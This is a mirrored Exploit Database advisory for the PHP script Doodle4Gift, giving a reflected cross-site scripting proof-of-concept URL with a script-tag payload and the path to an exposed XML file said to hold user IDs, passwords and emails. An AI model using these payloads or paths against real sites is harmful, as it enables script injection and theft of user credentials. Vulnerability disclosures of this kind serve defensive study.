Doodle4Gift – Multiple Vulnerabilities

Exploit Database
11 阅读

作者： Dr.NaNo

日期： 2014-01-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/31085/

# Exploit Title :Doodle4Gift <= Multiple Vulnerabilities
# Author:Dr.NaNo
# Date:H-1435/3/18 - 2014/1/19
# Software Link :http://www.hotscripts.com/listing/doodle4gift/
# Software Link2:https://sites.google.com/site/doodle4gift/
#
#
#(1) Cross Site Scripting (XSS):
#
#
#http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
#
#http://localhost/{path}/index.php?action=showprofile&profile=<script>alert('Dr.nano')</script>
#	 
#	 
#
#(2) information disclosure:
#
#
#http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
#
#
#
#A special gift for: (P0c Team),(V4-Team):إهداءً خاصاً لـ
#
#

last Exploits
Doodle4Gift – Multiple Vulnerabilities的更多信息

Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation：
CF Image Hosting Script 1.3.82 – File Disclosure：
WordPress Plugin HS Brand Logo Slider 2.1 – ‘logoupload’ File Upload：
CS-Cart 1.3.3 – ‘classes_dir’ LFI：
Inout SocialTiles 2.0 Script – Improper Access Restrictions：
XOS Shop – ‘goto’ SQL Injection：
ownCloud 4.0.x/4.5.x – ‘upload.php?Filename’ Remote Code Execution：
ES Simple Download 1.0. – Local File Inclusion：